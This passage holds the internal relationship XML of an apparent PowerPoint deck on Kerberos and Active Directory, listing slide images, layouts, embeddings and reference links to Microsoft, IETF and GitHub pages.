Target="../media/image70.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide105.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111.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId21"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1.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide105.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image161.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide106.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111.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide106.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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91.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide107.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image162.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image163.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image164.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide108.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84.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide108.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image162.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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95.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide109.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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1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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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169.wmf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide111.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject5.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject4.bin"/></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5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide113.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/download/en/details.aspx?id=4754" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide113.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.msdn.com/b/emilianb/archive/2009/04/16/using-delegconfig-tool-for-troubleshooting-kerberos-delegation-issues.aspx"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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide118.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notesSlide" Target="../notesSlides/notesSlide118.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image174.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image172.wmf"/></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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ietf.org/internet-drafts/draft-brezak-win2k-krb-rc4-hmac-01.txt" TargetMode="External"/><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1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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></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25.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image176.wmf"/></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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide128.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nidem/kerberoast/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide128.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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59.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide132.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/kb/305144/en-us" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide132.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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5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5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5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5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5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5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5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5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55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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5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5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55.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5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5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5.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55.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55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.wmf"/><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5.emf"/><Relationship Id="rId7"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5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5.emf"/><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5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5.emf"/><Relationship Id="rId7"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5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5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26.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/ms676007(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide29.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/cc237917.aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide31.xml"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide34.xml"/><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5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.msdn.com/b/openspecification/archive/2010/11/17/encryption-type-selection-in-kerberos-exchanges.aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide36.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/mt431816(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.msdn.com/b/openspecification/archive/2011/05/31/windows-configurations-for-kerberos-supported-encryption-type.aspx"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9.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55.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><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40.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70.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId12"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55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.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84.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide42.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70.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide42.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId19"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67.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide43.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96.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId12"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55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide44.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6.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide44.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide45.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95.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId12"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55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/></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55.xml"/></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7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.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5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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide52.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83.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide52.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" 